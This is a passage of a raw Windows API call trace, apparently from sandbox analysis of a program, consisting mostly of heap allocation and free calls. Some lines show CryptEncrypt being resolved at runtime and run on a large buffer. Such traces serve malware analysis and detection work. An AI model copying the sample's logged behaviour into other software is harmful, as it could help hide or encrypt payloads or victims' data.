(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0088.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0088.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0088.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0088.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0088.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0088.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0088.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0088.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0088.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0088.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0088.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0088.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0088.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0088.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0088.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0088.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0088.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0088.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0088.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0088.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0088.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0088.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0088.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0088.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0088.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0088.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0088.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0088.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0088.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0088.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0088.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0088.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0088.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0088.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0088.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0088.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0088.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0088.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0088.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0088.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0088.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0088.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0088.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0088.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0088.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0088.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0088.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0088.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0088.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0088.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0088.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0088.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0088.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3cc9020 | out: hHeap=0x2af0000) returned 1 [0088.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0088.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0088.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0088.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0088.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0088.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0088.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0088.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0088.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0088.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0088.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0088.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0088.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0088.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9f10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0088.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0088.552] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0088.552] CryptEncrypt (in: hKey=0x9a4280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xf0b30, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xf0b38) returned 1 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.552] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.552] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.552] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.552] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.553] CharLowerBuffW (in: lpsz="byte[985912]", cchLength=0xc | out: lpsz="byte[985912]") returned 0xc [0088.563] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.613] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.613] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0088.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0088.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0088.614] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0088.614] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0088.614] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.614] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0088.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0088.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70c0 [0088.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69700 [0088.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0088.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0088.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0088.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0088.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0088.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0088.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0088.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0088.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0088.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0088.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf0b30) returned 0x3dc1020 [0088.642] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0088.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0088.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0088.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0088.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd) returned 0x2aa9d00 [0088.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", 